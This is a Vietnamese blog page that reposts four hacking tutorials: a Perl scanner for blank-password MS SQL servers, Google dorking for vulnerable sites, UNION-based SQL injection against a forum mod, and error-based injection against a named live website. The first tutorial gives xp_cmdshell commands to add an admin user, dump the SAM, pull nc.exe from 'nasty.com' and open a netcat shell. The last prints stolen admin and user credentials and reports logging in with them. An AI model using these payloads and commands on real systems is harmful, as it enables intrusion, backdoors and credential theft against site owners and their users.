SMS™- CHUYÊN TRANG GIẢI TRÍ TỔNG HỢP » Sổ Tay Hacker

Tấn Công Ms Sql Server

giaitrisms — Fri, 28 Dec 2007 01:07:10 +0000

Posted on December 27, 2007 by VNIT

Giới thiệu : hồi giờ chúng ta tấn công vào server dùng MS SQL Server đa phần là dùng kĩ thuật SQL injection , đây là kĩ thuật hack phải nói là hay nhất , hiệu quả cao và nhanh chóng nhất , tuy nhiên trong bài này tôi sẽ đề cập đến 1 cách khác để hack vào MS SQL Server , cách này tuy xác suất thành công không cao bằng SQl injection nhưng cũng đáng để quan tâm bởi vì đâu phải lúc nào chúng ta cũng tìm thấy lỗi SQl injection .
Cách này của chúng ta tạm gọi là “TRSQL” vì đa phần là nhờ may mắn , nhưng chả hiểu sao hồi trước tới giờ tôi thấy cái may mắn này lại hay xảy ra .
Công cụ đầu tiên chúng ta cần là sqlbf (SQL Brute Force ) cái này cứ vào packetstorm mà tìm . Và cái tool connect vào MS SQL Server.

Chúng ta bắt đầu :

Hầu hết MS SQL Server đầu chạy trên TCP port 1433 , còn nếu chạy trên port khác thì mình dùng công cụ scan là cũng ra ngay thôi . Cái MS SQL server mà chúng ta bàn luận ở đây hơi cũ chút là : SQL 6.5 & 7.0 . Tuy cũ nhưng tôi vẫn viết ra ở đây mục đích là học hỏi kinh nghiêm chứ không phải mục đích là tìm mục tiêu để hack phá phách . Download sqlbt về xong thì run nó , rất dễ dùng , công việc của nó là kiếm password cho chúng ta login . Nhược điểm của MS SQL server thứ nhất là mặc định system administrator là “sa” , do đó chúng ta không cần phải brute cái username mà chỉ cần brute force cái password là đủ , thứ 2 là default password của sa là “không có gì hết” , cái này mới chết người , ai cũng quan niệm là “chỗ nguy hiểm nhất chính là chỗ an toàn nhất” , bởi vậy password là “không có gì hết” thì đố ai ngờ được , sai lầm chết người của nhiều người quản trị mạng ở chỗ đó , vì chúng ta có sqlbf tool nên ai có suy nghĩ đó là chết liền .

Sẵn đây tôi cũng giới thiệu với các bạn cái tool scan server có password là “không có gì hết” :

save lại nội dung code sau thành file senseql.pl , và run :
—————————————————————————————————————————————————————————————————-
• scans for hosts with blank passwords
• Brute Forces login attempts.
#!/usr/bin/perl
## SQL username/password checker
## Parameters: senseql
## Eg. to check for blank SA:
## senseql 10.0.0.1 sa “”
## Roelof Temmingh / Haroon Meer
## roelof@sensepost.com / haroon@sensepost.com
## SensePost IT Security
## http://www.sensepost.com/ http://www.hackrack.com/
## 2001/11/09
use IO::Socket;
$|=1;
if ($#ARGV<2) {die “Usage: senseql IP username password\n”;}
$port=1433; $host=$ARGV[0]; $username=$ARGV[1]; $pass=$ARGV[2];
$unh=pack(”a30″,$username);$psh=pack(”a30″,$pass);
$numu=pack(”c”,length($username)); $nump=pack(”c”,length($pass));
$FRONT=”020002000000020000000000000000000000000000 0000000000000000000000000
00000000000″;
$REST=”3030303030306130000000000000000000000000000 0000000201881b82c08030106
0a090101000000000000000000737175656c646120312e3000 0000000000000000000000000
000000000000b0000000000000000000000000000000000000 0000000000000000000000000
00″;
$REST2=”000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
000000040200004d5344424c49420000000706000000000d11 0000000000000000000000000
00000000000000000000000″;
$hfront=pack(”H*”,$FRONT);$hrest=pack(”H*”,$REST); $hrest2=pack(”H*”,$REST2)
;
$FULL=$hfront.$unh.$numu.$psh.$nump.$hrest.$nump.$ psh.$hrest2;
$SENDY2=”02010047000002000000000000000001000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000003030300000000300000
0″;
$SENDY2 = pack(”H*”,$SENDY2);
print “$host:$username:$pass:”;
$remote = IO::Socket::INET->new(Proto=>”tcp”,PeerAddr=>$host,PeerPort =>
$port) || die “No SQL here man…”;
print $remote $FULL; print $remote $SENDY2;
recv($remote,$back,100,MSG_PEEK);
if ($back =~ /context to ‘master’/) {print “Yep – go for it\n”}
else {print “No dude..\n”;}
close ($remote);
Lets move on… at least to admins who have had the sense to change the admin password

—————————————————————————————————————————————————————————————————-

Giả sử như sqlbt tìm ra password của sa và login vào với username “sa” , chúng ta phải làm gì đây để nắm hoàn toàn hệt thống ?

Giờ đây chúng ta có thể dùng Stores Procedures , đặc biệt là xp_cmdshell , vấn đề bi giờ giống như là chúng ta hack bằng SQL injection mà có quyền “sa” vậy . Sẵn đây tôi sẽ giới thiệu cho các bạn biết sơ về các Extended Stores Procedures cần thiết và chức năng của nó :

xp_regread – reads a registry value
xp_rewrite – writes to the registry
xp_regdeletekey – deletes a key
xp_regdeletevalue – deletes a key’s value
xp_regenumvalues – lists names of value entries
xp_regaddmultistring – adds a multistring (zero-delimited string)
xp_regremovemultistring – removes a multi string (zero delimited string)

Nhiệm vụ chính của chúng ta hiện giờ là , add ADMIN , đổ SAM và UPLOAD Backdoor .

Thêm tài khoản vào Administrators Group : ( username : Mask_NBTA , password : hacked )

Xp_cmdshell ‘net user Mask_NBTA hacked /ADD’
Xp_cmdshell ‘net localgroup /ADD Administrators Mask_NBTA’

Đổ SAM :
Có quyền admin thì đọc file SAM và Crack bằng L0pth Crack 4.0 : ( máy tôi pentium 4 1.7 Ghz crack 2 user mất khoảng 7h )
Xp_regread ‘HKEY_LOCAL_MACHINE’,’SECURITY\SAM\Domains\Account ‘,’F’
Tại sao thông qua “sa” ta có thể làm nhiều việc như vậy , tại vì mặc định SQL Server chạy với quyền “local system”

UPLOAD Backdoor :
Các bạn có thể dùng backdoor gì tuỳ thích , ở đây tôi dùng netcat ( xưa giờ vẫn ko thấy con nào hay hơn con này ) :
xp_cmdshell ‘tftp –I nasty.com GET nc.exe c:\nc.exe’
và thi hành nó bằng cách :
xp_cmdshell ‘c:\nc.exe –l –p 8000 –e cmd.exe’
Sau đó vào DOS , telnet vào server ở PORT 8000
Xong , với 3 công việc này bạn đã biết phải làm gì khi có được “sa” ở MS SQL Server .
Àh , nếu bạn nào vô tình bằng cách gì đó có được password HASH của “sa” thì tôi xin giới thiệu 1 cách để crack password này rất hiệu quả .
Hướng dẫn cặn kẽ và có tool sãn ở đây : http://www.ngssoftware.com/ tìm file cracking-sql-passwords.pdf
Lưu ý : các kiến thức trên chỉ là để học hỏi , các bạn không nên dùng nó để phá hoại .

Hướng dẫn cách tìm Website bị lỗi

giaitrisms — Fri, 28 Dec 2007 01:05:36 +0000

Posted on December 27, 2007 by VNIT

Tôi sẽ hướng dẫn các bạn cách tìm các Website bị lỗi, đa số cách thông dụng nhất là vào các trang Search như http://www.google.com, http://www.av.com … rồi đánh “powered by ….” (ví dụ : nếu tìm trang Forum UBB 1.0.3 thì đánh “powered by UBB 1.0.3″).

Nhưng như thế thường không hiệu quả và nó cho ra rất nhiều trang chẳng liên quan gì đến trang mình cần tìm. Bây giờ tôi chỉ cho các bạn tìm kiếm trang bị lỗi trên http://www.google.com.
Bình thường một chương trình trên mạng đều có một đoạn string đặc biệt trong URL, ví dụ với lỗi Hosting Controller thì sẽ có đoạn “/admin hay /advadmin hay /hosting” hay với forum UBB thì có “cgi-bin/ultimatebb.cgi?”, khi chỉ đánh vậy không nó sẽ liệt kê ra cả trang nói về Hosting Controller lẫn trang đang sử dụng Hosting Controller, như thế kết quả ra nhiều nhưng không hiệu quả. Bây giờ các bạn thêm chữ allinurl: trước đoạn string đặc biệt cần kiếm, thì những tran Web tìm kiếm được chắc chắn sẽ có chuỗi cần tìm.
Ví dụ : Khi tôi kiếm server dùng Hosting Controller, tôi vào http://www.google.com và đánh “allinurl:/advadmin” (không có ngoặc kép) thì nó chỉ liệt kê ra những trang có URL có dạng : http://tentrangweb.com/advadmin.

Nhân tiện tôi cũng chỉ các bạn cách tìm các file trên http://www.google.com
Muốn tìm các file trên http://www.google.com thì bạn thêm chữ type file: trước tên file cần tìm trên các chuyên khu web.
Ví dụ : bạn muốn tìm file mdb (đây là file chứa Password của các Website, dùng Access để mở) thì bạn vào http://www.google.com và đánh type file:mdb
bạn muốn tìm file SAM (đây là file chứa Password của Windows NT, dùng L0phtCrack để Crack) thì bạn vào http://www.google.com và đánh type file:SAM

Kỹ Thuật, tư duy khai thác SQL Injection trong Forum

giaitrisms — Fri, 28 Dec 2007 01:04:45 +0000

Posted on December 27, 2007 by VNIT

Chào các bạn! Hôm nay chúng ta sẽ nghiên cứu về cách thức khai thác lỗi SQL inject trong Forum nhé!

Việc hack forum dính SQl inject là cũng cơ bản khá giống việc hack SQL inject trong các SHOP,WEB mà chúng ta đã hack thôi! kiến thức để tìm hiểu thì bạn chỉ cần biết một ít câu lệnh SQL và thông thạo việc sử dụng ,cài đặt, quản lý Forum là ok!
Hò! Bắt đầu nào:

Việc tìm ra một Site dính SQL thì chúng ta có thể sử dụng BUG được puplic trên các diendan về hacking ! còn khi mà người ta đã cho mình Code Exploitx rồi thì chẳng còn gì để nói! nhưng nếu người ta không public thì chỉ còn cách tự tìm lấy thôi! Tôi sẽ trình bày cho bạn thật dễ hiểu và sẽ dùng DEMO để cho các bạn thực hành luôn!

1. chúng ta sẽ thực hành với lỗi Mod UOCNGUYEN :

Trong Code Uocnguyen của nó! thì có đoạn:

Quote:
function showwish(){
global $DB, $ibforums, $std;
$wish = $ibforums->input[’id’];
$DB->query( “SELECT * FROM ibf_wish_main WHERE ID LIKE {$wish} LIMIT 1″);

đoạn code bị lỗi là: Quote:

$wish = $ibforums->input[’id’];

vì giá trị id được input vào không được kiểm tra là dạng number hay char … nên nó bị dính lỗi SQl inject.

link bị lỗi của nó:
http://72.36.192.69/~phucducc/demo/uocnguy…wwish&id=1′

bạn nhập user/pass: demo / demo vào để xem !

xuất hiện thông báo lỗi:

Quote:
mySQL query error: SELECT * FROM ibf_wish_main WHERE ID LIKE 1′ LIMIT 1

mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ” at line 1
mySQL error code:
Date: Wednesday 22nd of March 2006 02:51:09 AM

hò! Chúng ta chú ý đến cái đoạn này trong thông báo lỗi : Quote:
SELECT * FROM ibf_wish_main WHERE ID LIKE 1′ LIMIT 1

đây là câu lệnh truy vấn mà sử dụng để lấy các thông tin về phần uocnguyen . do ID không được kiểm soát nên khi thêm dấu phẩy vào thì nó báo lỗi! bây giờ chúng ta sẽ đi nghiên cứu cách để lấy các dữ liệu về mật khẩu của admin :

Nếu bạn đọc được SQL thì sẽ hiểu là dấu * trên là chỉ nó lựa chọn truy vấn mọi colum có trong table ibf_wish_main ! vậy bây giờ ta sẽ lợi dụng lỗi SQL injec để truy vấn
các thông tin cần thiết trong table ibf_members (là nới chứa các thông tin về MEM)

để bắt đầu hack thì chúng ta phải vô hiệu hóa câu truy vấn của nó! nghĩa là làm cho câu lệnh truy vấn trên của nó không trả về giá trị gì cả! và đó là lý do mà khi các bạn đọc các code exploixt của người khác thì các bạn thấy có mấy dấu là lạ sau link lỗi của nó! chúng ta có các ký tự thường hay dùng để vô hiệu hóa câu lệnh truy vấn của Victim : /* hoặc ) hoặc )/ hoặc ); ……… hoặc là đưa giá trị input của nó thành giá trị âm! nghĩa là nó đang là 1 thì mình cho về -1 ! có khi là vừa thêm giá trị âm vừa thêm các ký tự metal /* … phía sau nũă! các bạn nghiên cứu thêm nhé! bây giờ! thì tôi dùng cách đưa giá trị input của nó thành âm để vô hiệu hóa câu lệnh truy vấn của nó: như sau:
http://72.36.192.69/~phucducc/demo/uocnguy…=showwish&id=-1

bạn thấy đấy! phần “uớc nguyện là ” đã không còn giá trị gì! vì câu lệnh truy vấn của nó đã bị vô hiệu hóa! nên nó chẳng trả về giá trị gì nữa! và bây giờ chúng ta có thể thêm vào sau nó một câu lệnh truy vấn của chúng ta và nó sẽ Run ngay!

hò! đến đây thì chúng ta bắt đầu sử dụng câu lệnh UNION ! nó có nhiệm vụ kết hợp 2 câu lệnh SELECT với nhau (tất nhiên là 2 câu lệnh SELECT phải có cùng các colum! ) tôi khuyên bạn chưa biết thì nên tìm đọc phần câu lệnh UNION đi! OK!

bước quan trọng là đây:

các bạn nhìn vào hình bên dưới:

thì các bạn sẽ thấy là trogn table ibf_wish_main có 8 column! và vấn đề là cái MOD uocnguyen được xây dụng để chỉ có 8 column trogn table của nó! nên câu lệnh truy vấn của nó khi dùng ký tự * là để thể hiện sự truy vấn 8 column đó! và như thế thì câu lệnh SELECT thứ 2 của chúng ta cũng sẽ phải là chỉ có 8 column! và có 2 cách để thực hiện câu truy vấn của bạn: bạn có thể làm như sau:

a. Select lần lượt các column của nó từ giá trị 1 đến khi nào mà nó báo hết rồi! (không trả thêm giá trị nào nữa!) nghĩa là bạn thay * bằng giá trị 1,2,3,4,….. bạn hiểu rồi chứ! vậy thì ta sẽ có câu lệnh truy vấn của Mođ uocnguyen là:
http://72.36.192.69/~phucducc/demo/uocnguy…0union%20SELECT
và tiếp theo http://72.36.192.69/~phucducc/demo/uocnguy…0union%20SELECT

……………

cho đến :

http://72.36.192.69/~phucducc/demo/uocnguy…0union%20SELECT

thì ta được là:

Quote:
Ước nguyện của 2
2 đến từ 3
2 ước nguyện vào ngày 2000-00-04

Ước nguyện là :
8

vậy thì chúng ta có là phần hiện thị của nó là phần số 2 và số 8! đó chính là các giá trị của column trong table ibf_wish_main.

bây giờ thì bạn chỉ cần thay cái gía trị của table ibf_wish_main thành table ibf_members và ở column số 2 thì bạn thay vào đó column tên của admin là name
và column thứ 8 password !!!! (các column của ibf_members thì bạn vào trong phpmyadmin rồi nghiên cứu! ở đây mình chỉ hướng dẫn cho các bạn đã biết vè nó rồi! OK!)

và bây giờ câu lệnh của nó là :

http://72.36.192.69/~phucducc/demo/uocnguy…0union%20SELECT 1,name,3,4,5,6,7,password FROM ibf_members WHERE ID LIKE 1

bạn đã thấy gì chưa?

Ước nguyện của admin
admin đến từ 3
admin ước nguyện vào ngày 2000-00-04

Ước nguyện là :

8005125c396680661893d36fc0723158

b. cách thứ 2 là bạn đã kinh nghiệm và như thế thì bạn chỉ cần vào tìm hiểu xem table của cái phần bị lỗi đó có bao nhiêu column! và bạn thay dấu * bằng từng đó giá trị! ở đây là 8 column và sẽ là 1,2,3,4,5,6,7,8 và sau đó! lại Run trên Browse để xem column nào hiển thị ra! thì thay các giá trị tương ứng vào! OK!

2. HACK lỗi ở phần Showtopic:

Quote:
else if ( $ibforums->input[’showtopic’] != “”)
{
$ibforums->input[’act’] = “ST”;
$ibforums->input[’t'] = $ibforums->input[’showtopic’];

// Grab and cache the topic now as we need the ‘f’ attr for
// the skins…

nhìn qua ta sẽ thấy là dính lỗi SQL injec ở phần showtopic! Ok ! link bình thường của nó:

http://72.36.192.69/~phucducc/demo/s…hp?showtopic=1

và dính lỗi : http://72.36.192.69/~phucducc/demo/ssi/ind…howtopic=1′
Quote:
mySQL query error: SELECT t.*, f.topic_mm_id, f.name as forum_name, f.quick_reply, f.id as forum_id, f.read_perms, f.reply_perms, f.parent_id, f.use_html,
f.start_perms, f.allow_poll, f.password, f.posts as forum_posts, f.topics as forum_topics, f.upload_perms,
f.show_rules, f.rules_text, f.rules_title,
c.name as cat_name, c.id as cat_id
FROM ibf_topics t, ibf_forums f , ibf_categories c
WHERE t.tid=1′ and f.id = t.forum_id and f.category=c.id

mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ” at line 6
mySQL error code:
Date: Wednesday 22nd of March 2006 04:04:40 AM

bây giờ chúng ta sẽ vô hiệu hóa câu lệnh truy vấn của Link trên:

đầu tiên thử với thay đổi giá trị http://72.36.192.69/~phucducc/demo/s…hp?showtopic=1 thành
http://72.36.192.69/~phucducc/demo/ssi/ind…hp?showtopic=-1 bây giờ bạn chú ý là câu lệnh truy vấn của nó là:
Quote:
SELECT t.*, f.topic_mm_id, f.name as forum_name, f.quick_reply, f.id as forum_id, f.read_perms, f.reply_perms, f.parent_id, f.use_html,f.start_perms, f.allow_poll, f.password, f.posts as forum_posts, f.topics as forum_topics, f.upload_perms, f.show_rules, f.rules_text, f.rules_title, c.name as cat_name, c.id as cat_id FROM ibf_topics t, ibf_forums f, ibf_categories c WHERE t.tid=1

nghĩa là nếu bây giờ mình mà vô hiệu hóa được câu lệnh của Link trên! thì chỉ cần ta nhập vào Link trên phần Union + lệnh truy vấn của chính nó! thì ta sẽ có được nội dung của nó như ban đầu! bạn hiẻu rồi chứ!

Và như thế thì thay đổi giá trị âm của Link trên thì chưa đựoc : http://72.36.192.69/~phucducc/demo/ssi/ind…WHERE%20t.tid=1

và lại thử với việc thêm /* hoặc ) hay ); …… cái nào được thì là đúng! cuối cùng thì mình thay giá trị 1 bằng giá trị 0 và thử vào:
http://72.36.192.69/~phucducc/demo/s…hp?showtopic=0

và thêm phần Union: http://72.36.192.69/~phucducc/demo/ssi/ind…WHERE%20t.tid=2

ok roài! vậy là việc thay giá trị Id của nó =0 là đúng! bởi vì số Id của Topic thì chẳng mấy khi có giá trị =0! mà chỉ có bắt đầu =1 trở đi! mặt khác! các bạn chú ý là khi mình thêm phần Union vào thì giá trị mà mình SELECT là Id=2 nghĩa là mình đã vô hiệu câu lệnh truy vấn của nó đi! và bắt nó truy vấn phần Id=2 vào! và nó làm việc tốt! nghĩa là bạn đã vô hiệu hóa thành công! OK!
vậy là bây giờ chúng ta sẽ đi làm việc với link đã bị vô hiệu hóa là :http://72.36.192.69/~phucducc/demo/s…hp?showtopic=0 !

hò!

bây giờ tôi sẽ giải thích cho các bạn các ký tự t.*, f.topic_mm_id, f.name là cái gì!

các bạn nhìn vào phần : Quote:
SELECT t.*, f.topic_mm_id, f.name as forum_name, f.quick_reply, f.id as forum_id, f.read_perms, f.reply_perms, f.parent_id, f.use_html,
f.start_perms, f.allow_poll, f.password, f.posts as forum_posts, f.topics as forum_topics, f.upload_perms,
f.show_rules, f.rules_text, f.rules_title,
c.name as cat_name, c.id as cat_id
FROM ibf_topics t, ibf_forums f , ibf_categories c
WHERE t.tid=1

thì đoạn Quote:
FROM ibf_topics t, ibf_forums f , ibf_categories c
nghĩa là giá trị t là được gán giá trị là thay thế cho Table ibf_topics ; f có giá trị là Table ibf_forums và c được gán là Table ibf_categories ; (người ta có thể thay thế t,f,c bằng những chữ khác! cái đó không quan trọng!)

và như thé là các bạn hiểu là t.* chính là thay thế cho ibf_topics t.* và f.topic_mm_id là thay thế cho ibf_forums.topic_mm_id !!!!

và bây giờ các bạn có thế tưởg tượng ra vấn đề rùi đấy! chúng ta sẽ không đi mò mẫm đi tìm xem có bao nhiêu Colum để mà SELECT nữa! mà tôi sẽ xem là phần mà nó hiện ra trong Topic ấy! nghĩa là trong cái link này: http://72.36.192.69/~phucducc/demo/ssi/ind…WHERE%20t.tid=2

thì phần tiêu đề của nó là :chào anh em!
là được lưu trữ trong Column nào! (ý tưởng của tôi là muốn Pass của Admin sẽ hiện ra ở phần đó! nghĩa là đáng lẽ nó sẽ hiện ra cái nội dung của TOpic đo! nhưng mà tôi sẽ làm cho nó hiện ra Pass của Admin ở đó) Tất nhiên là nó sẽ nằm trong 3 Table ibf_topics , ibf_forums , ibf_categories thôi! vì trong cái phần SHOWTOPIC này thì nó chỉ SELECT từ 3 Table đó! Ok chưa!

và tôi sẽ viết cách làm của tôi nhanh hơn! không thủ công dò tìm nữa! mệt quá! hò! bây giờ! tôi Cài Localhost và tôi install 1 forum giống như thế! và tôi vào trong DATA cải nó!(vào PHPMYADMIN) và vào phần table ibf_topics vì tôi đoán đây là phần chứa cái nội dung các Topic !

và dựa tôi chọn phần ibf_topics !

các bạn thấy phần id tôi đánh vào đó 1 số nào đó! ví dụ số 4! nó sẽ hiện ra:

và bây giờ ta thấy là phần chữ: chào các bạn ! được chưa trong Cloumn : title! ok (cái ảnh này tôi lấy trong LOCALHOST để làm minh họa!)

bây giờ tôi sẽ viết lại phần t.* như sau: dựa vào các Column của Topic ibf_topics thì ta có : Quote:
t.tid, t.title, t.description, t.state, t.posts, t.starter_id, t.start_date, t.last_poster_id, t.last_post, t.icon_id, t.starter_name, t.last_poster_name, t.poll_state, t.last_vote, t.views, t.forum_id, t.approved, t.author_mode, t.pinned, t.moved_to, t.rating, t.total_votes

và bây giờ ta có lệnh truy vấn của Link Lỗi là :

Quote:
SELECT t.tid, t.title, t.description, t.state, t.posts, t.starter_id, t.start_date, t.last_poster_id, t.last_post, t.icon_id, t.starter_name, t.last_poster_name, t.poll_state, t.last_vote, t.views, t.forum_id, t.approved, t.author_mode, t.pinned, t.moved_to, t.rating, t.total_votes, f.topic_mm_id, f.name as forum_name, f.quick_reply, f.id as forum_id, f.read_perms, f.reply_perms, f.parent_id, f.use_html,
f.start_perms, f.allow_poll, f.password, f.posts as forum_posts, f.topics as forum_topics, f.upload_perms,
f.show_rules, f.rules_text, f.rules_title,
c.name as cat_name, c.id as cat_id
FROM ibf_topics t, ibf_forums f , ibf_categories c
WHERE t.tid=1

Ok rồi! bây giờ tôi sẽ cho phần Titile là hiện ra phần Pass admin nhé! tôi sẽ thêm vao trong truy vấn của trên một trường là m với m được gán cho giá trị của table ibf_members ! nghĩa là nó có dang:

và tôi sẽ thay thế trường t.title thành m.password :

Quote:
SELECT t.tid, m.password, t.description, t.state, t.posts, t.starter_id, t.start_date, t.last_poster_id, t.last_post, t.icon_id, t.starter_name, t.last_poster_name, t.poll_state, t.last_vote, t.views, t.forum_id, t.approved, t.author_mode, t.pinned, t.moved_to, t.rating, t.total_votes, f.topic_mm_id, f.name as forum_name, f.quick_reply, f.id as forum_id, f.read_perms, f.reply_perms, f.parent_id, f.use_html,
f.start_perms, f.allow_poll, f.password, f.posts as forum_posts, f.topics as forum_topics, f.upload_perms,
f.show_rules, f.rules_text, f.rules_title,
c.name as cat_name, c.id as cat_id
FROM ibf_topics t, ibf_forums f , ibf_categories c, ibf_members m
WHERE t.tid=1

vậy bây giờ ta có thể lấy pass admin đựoc rùi: và chú ý là phải thay thế cái WHERE t.tid=1 thành WHERE m.id=1 với việc này là ta SELECT theo trường Id trong Table ibf_members . id=1 là số Id của admin!~ vậy link là:

http://72.36.192.69/~phucducc/demo/ssi/ind…0WHERE%20m.id=1

bạn nhìn lên màn hình !ở trên cũng ầy! sẽ thấy chuỗi pass hiện ra dưới dạng passhash!nếu bạn chưa thấy rõ thì chúng ta sẽ cho passhash hiện ra ở phần khác! chỉ cần thay đổi giá trị mà bạn muốn hiện ra là được! thay đổi các column truy vấn là Ok thoai! vì cái WEB này Code nó làm sao ấy! nên mình không cho nó hiện ra dễ nhìn hơn được! code khác thì dễ hơn! hiiiiiii

cái này là DEMO! nó áp dụng cho lỗi SQL inject trong Forum! nên phiên bản nào không quan trọng chỉ cần sự tư duy + tính toán kỹ là có thể viết được Code Exploitx các Bug Sql inject trong Forum!

các anh em có thể khai nghiên cứu và viết code Exploitx cái Bug này:
Bug nằm ở file calendar.php trong thư mục Source:
http://72.36.192.69/~phucducc/demo/s…vent&eventid=1
phần Bug: http://72.36.192.69/~phucducc/demo/s…eventid=1′

Quote:
mySQL query error: SELECT * FROM ibf_calendar_events WHERE eventid=1′

mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ” at line 1
mySQL error code:
Date: Monday 27th of March 2006 10:09:11 AM

các anh em có thể Download code của nó về install để nghiên cứu các table :http://72.36.192.69/~phucducc/demoloi.zip

(Bug nằm ở file calendar.php trong thư mục Source)

Các anh em xem ai nhanh chóng viết được Code Exploitx nhé!

Ok!

Khai thác SQL Injection để hack DB

giaitrisms — Fri, 28 Dec 2007 01:02:45 +0000

Posted on December 27, 2007 by VNIT

Bài viết này do bạn Neo viết ra, nhằm giúp đỡ các bạn không biết gì về Hack có thể Hack được một trang Web khi phát hiện bị lỗi SQL Injection và có sử dụng OLE DB đồng thời cũng để khích lệ các thành viên và điều hành viên tích cực Post bài và săn Bug nhiều hơn nữa trong forumj của bạn ấy. Vì thấy đây là 1 bài viết khá bổ ích nên muội đã sưu tầm lại cho các huynh tìm hiểu.

======================

Ở đây tôi xin giới thiệu cách Hack vào Website http://www.equipmentworldindia.com vì Website này không có nhiều thông tin quan trọng nên mức ảnh hưởng khi đưa ra cho các bạn thực hành sẽ không cao.

Bây giờ ta bắt đâu công việc

bug : http://www.equipmentworldindia.comsh…asppid= 1’/

Kết quả

Error Type

Microsoft OLE DB Provider for SQL Server (0×80040E14)

Unclosed quotation mark before the character string ”.

shopViewProduct.asp, line 115

1. Thu thập cấu trúc dữ liệu

Ta bắt đầu lấy cấu trúc dữ liệu của Website này.

Lấy Table đầu tiên trong CSDL của Website

Trích dẫn:

httpwww.equipmentworldindia.comshopViewProduct.asp PID=1%20and%201=convert(int,(select%20top%201%20ta ble_name%20from%20information_schema.tables))##sp_ password

Cho ta kết quả

Trích dẫn:

Error TypeMicrosoft OLE DB Provider for SQL Server (0×80040E07)

Syntax error converting the nvarchar value ‘EWIAlsoArticle’ to a column of data type int.

shopViewProduct.asp, line 115

Như vậy ta có table đầu tiên ‘EWIAlsoArticle’

Lấy tiếp table thứ hai

Trích dẫn:

httpwww.equipmentworldindia.comshopViewProduct.asp PID=1%20and%201=convert(int,(select%20top%201%20ta ble_name%20from%20information_schema.tables%20wher e%20table_name%20not%20in%20(’EWIAlsoArticle’)))## sp_password

Kết quả

Trích dẫn:

Error TypeMicrosoft OLE DB Provider for SQL Server (0×80040E07)

Syntax error converting the nvarchar value ‘dtproperties’ to a column of data type int.

shopViewProduct.asp, line 115

Như vậy table thứ hai là ‘dtproperties’

Lấy tiếp table thứ ba

Trích dẫn:

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20table_ name%20from%20information_schema.tables%20where%20 table_name%20not%20in%20(’ewialsoarticle’,’dtprope rties’)))/##sp_password

Kết quả

Trích dẫn:

Error TypeMicrosoft OLE DB Provider for SQL Server (0×80040E07)

Syntax error converting the nvarchar value ‘ewi_Admin_User’ to a column of data type int.

shopViewProduct.asp, line 115

Như vậy ta có table thứ 3 là ‘ewi_Admin_User’ một Table quan trọng.

Nếu muốn các bạn có thể tiếp tục lấy thêm các table khác, để lấy được đúng table mà bạn cần.

Làm tương tự cho các table tiếp theo, các bạn có thể lấy được table EWIUsers là Table chứa thông tin về thành viên đăng ký trong Website này.

2. Lấy User và Pass Admin

Biết Table Admin là ta phải thu thập nốt các Column trong Table đó.

Lấy Column đầu tiên

Trích dẫn:

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20column _name%20from%20information_schema.columns%20where% 20table_name=(’ewi_admin_user’)))/##sp_password

Kết quả

Trích dẫn:

Error TypeMicrosoft OLE DB Provider for SQL Server (0×80040E07)

Syntax error converting the nvarchar value ‘Userid’ to a column of data type int.

shopViewProduct.asp, line 115

Như vậy ta có Column đầu tiên là ‘Userid’
Sau đó lấy tiếp column tiếp theo bằng where column_name not in bằng URL sau

Trích dẫn:

Kết quả

Trích dẫn:

Error TypeMicrosoft OLE DB Provider for SQL Server (0×80040E07)

Syntax error converting the nvarchar value ‘Password’ to a column of data type int.

shopViewProduct.asp, line 115

Như vậy ta lấy được column thứ hai là Password.

Bây giờ thì ta lấy Pass Admin được dễ dàng.

Trích dẫn:

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20userid %2b”%2bpassword%20from%20ewi_admin_user))/##sp_password

Kết quả là

Trích dẫn:

Error TypeMicrosoft OLE DB Provider for SQL Server (0×80040E07)

Syntax error converting the varchar value ‘ewistarplus’ to a column of data type int.

shopViewProduct.asp, line 115

Như vậy UserPass của Admin là ewistarplus

Đăng nhập thử

http://www.equipmentworldindia.com

Đăng nhập thành công. Bạn đã là Admin của Site này.

Và từ đó có thể quản lý người dùng dễ dàng. Tuy nhiên phần dưới đây tôi vẫn trình bày cách lấy User và Pass của người dùng nhằm mục đích phần này để các bạn tự làm theo giống như đã là với lấy Pass Admin. Nếu ko làm được các bạn có thể xem Guide tiếp.

3. Lấy thông tin người dùng

Table chứa User và Pass của người sử dụng trong site này là ‘EWIUsers’. Các bạn thu thập các column của table này và có danh sách các column như sau

Trích dẫn:

‘User_Id’,’Loginname’,’Password’,’UserType’,’Creat iondate’
(Thông qua URL http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20column _name%20from%20information_schema.columns%20where% 20table_name=(’ewiusers’)%20and%20column_name%20no t%20in%20(’user_id’,’loginname’,’password’,’userty pe’,’creationdate’)))/##sp_password)

Lấy User và Password của người dùng đầu tiên

Trích dẫn:

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20loginn ame%2b”%2bpassword%20from%20ewiusers))/##sp_password

Kết quả

Trích dẫn:

Microsoft OLE DB Provider for SQL Server (0×80040E07)Syntax error converting the varchar value ‘advanced1advanced1′ to a column of data type int.

shopViewProduct.asp, line 115

Như vậy UserPass của người dùng đầu tiên là advanced1advanced1

Đăng nhập thử http://www.equipmentworldindia.com

Nhập User và Pass vào Form Login phía tay trái, đăng nhập thành công. Done !

Bạn có thể lấy User và Pass của người dùng tiếp theo bằng where User_id not in

Ví dụ lấy UserPass của người thứ hai

Trích dẫn:

http://www.equipmentworldindia.comshopviewproduct.asppid= 1%20and%201=convert(int,(select%20top%201%20loginn ame%2b”%2bpassword%20from%20ewiusers%20where%20us er_id%20not%20in%20(’1′)))/##sp_password

Kết quả

Trích dẫn:

Microsoft OLE DB Provider for SQL Server (0×80040E07)Syntax error converting the varchar value ‘agilent1agilent1′ to a column of data type int.

shopViewProduct.asp, line 115

